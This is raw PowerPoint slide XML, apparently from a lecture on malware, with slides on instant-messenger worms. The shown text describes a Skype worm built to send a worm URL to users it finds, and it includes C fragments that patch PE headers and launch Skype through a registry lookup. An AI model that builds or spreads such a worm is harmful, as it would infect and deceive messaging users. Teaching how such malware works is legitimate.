              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                              ... fix the relocation info for global or static variables		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// recover the dll characteristics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	OptHeader(FileBase)-&gt;DllCharacteristics = 0x8100;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>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IM Worms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3" name="Text Placeholder 63490" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234377d220a7d0a"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1905" y="1146175"/>
            <a:ext cx="11532870" cy="2980690"/>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9795" marR="0" lvl="0" indent="-539750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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Skype is a nice IM that let you to chat or to do VoIP call, so this program </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 be </a:t>
            </a:r>
            <a:r>
              <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designed to be a spreading vector.  It send</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r>
              <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url to worm to the found users. It creates a window that wraps the functionality to send url to found users. The users are randomly generated by giving nicknames.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0"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568515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Overview</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3240405" y="3036570"/>
            <a:ext cx="5711825" cy="1278890"/>
            <a:chOff x="1726" y="2132"/>
            <a:chExt cx="8995" cy="2014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="圆角矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2238" y="2251"/>
              <a:ext cx="8483" cy="1776"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="20E4F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5" name="椭圆 14"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1726" y="2132"/>
              <a:ext cx="2014" cy="2014"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="08BDC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21" name="椭圆 20"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1865" y="2271"/>
              <a:ext cx="1736" cy="1736"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="FFFFFF">
                  <a:lumMod val="65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27" name="文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1864" y="2665"/>
              <a:ext cx="1736" cy="949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:normAutofit fontScale="875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0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="10BDCC"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="10BDCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="文本框 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3741" y="2281"/>
              <a:ext cx="6979" cy="1716"/>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rPr>
                <a:t>Example</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="30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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3240405" y="4697095"/>
            <a:ext cx="5711825" cy="1278890"/>
            <a:chOff x="1725" y="4834"/>
            <a:chExt cx="8995" cy="2014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="圆角矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2237" y="4953"/>
              <a:ext cx="8483" cy="1776"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="A728B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31" name="椭圆 30"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1725" y="4834"/>
              <a:ext cx="2014" cy="2014"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="80219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32" name="椭圆 31"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1864" y="4973"/>
              <a:ext cx="1736" cy="1736"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="FFFFFF">
                  <a:lumMod val="65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33" name="文本框 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2072" y="5367"/>
              <a:ext cx="1320" cy="949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" bIns="0"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300" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="802196"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="802196"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="文本框 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3740" y="5003"/>
              <a:ext cx="6980" cy="1741"/>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rPr>
                <a:t>Comparison</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="30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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3240405" y="1376045"/>
            <a:ext cx="5711825" cy="1278890"/>
            <a:chOff x="1726" y="2132"/>
            <a:chExt cx="8995" cy="2014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="圆角矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2238" y="2251"/>
              <a:ext cx="8483" cy="1776"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF433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8" name="椭圆 14"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1726" y="2132"/>
              <a:ext cx="2014" cy="2014"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E80A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0" name="椭圆 20"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1865" y="2271"/>
              <a:ext cx="1736" cy="1736"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="FFFFFF">
                  <a:lumMod val="65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1" name="文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1864" y="2665"/>
              <a:ext cx="1736" cy="949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:normAutofit fontScale="875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0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="E60D03"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="E60D03"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="文本框 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3741" y="2281"/>
              <a:ext cx="6980" cy="1716"/>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3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Worms</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" sz="3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>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IM Worms- Launch Skype</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4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113983" y="1111250"/>
            <a:ext cx="11964035" cy="5237480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>void RunSkype(void)</a:t>
            </a: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a:t>
            </a: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	HKEY hKey;</a:t>
            </a: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	char skype_path[MAX_PATH];</a:t>
            </a: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	DWORD len = MAX_PATH;</a:t>
            </a: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	STARTUPINFO inf_prog;  //Specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time.</a:t>
            </a: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                     PROCESS_INFORMATION info_pr; //Contains information about a newly created process and its primary thread</a:t>
            </a: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	int user_ret;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pP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                     #define ERROR MessageBox(NULL,"I could not find Skype !","Error!",MB_OK|MB_ICONERROR); \</a:t>
            </a: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	          ExitProcess(0);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pP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                       /* path of skype in registry */</a:t>
            </a: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  	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Skype\\Phone",0, KEY_QUERY_VALUE,&amp;hKey) != ERROR_SUCCESS){</a:t>
            </a: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			ERROR</a:t>
            </a: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		}</a:t>
            </a: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         </a:t>
            </a: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	if(RegQueryValueEx(hKey,"SkypePath",0,NULL,skype_path, &amp;len) != ERROR_SUCCESS) {</a:t>
            </a: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			ERROR</a:t>
            </a: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		}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	RegCloseKey(hKey);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="020206030504050203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IM Worms-Launch Skype</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3" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648653" y="1022985"/>
            <a:ext cx="10894695" cy="5354320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		memset(&amp;inf_prog,0,sizeof(STARTUPINFO));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	                memset(&amp;info_pr,0,sizeof(PROCESS_INFORMATION));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	                inf_prog.cb = sizeof(STARTUPINFO);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>                                inf_prog.dwFlags = STARTF_USESHOWWINDOW;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>                                inf_prog.wShowWindow = SW_SHOW;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		if(CreateProcess(NULL,skype_path,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,NULL,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
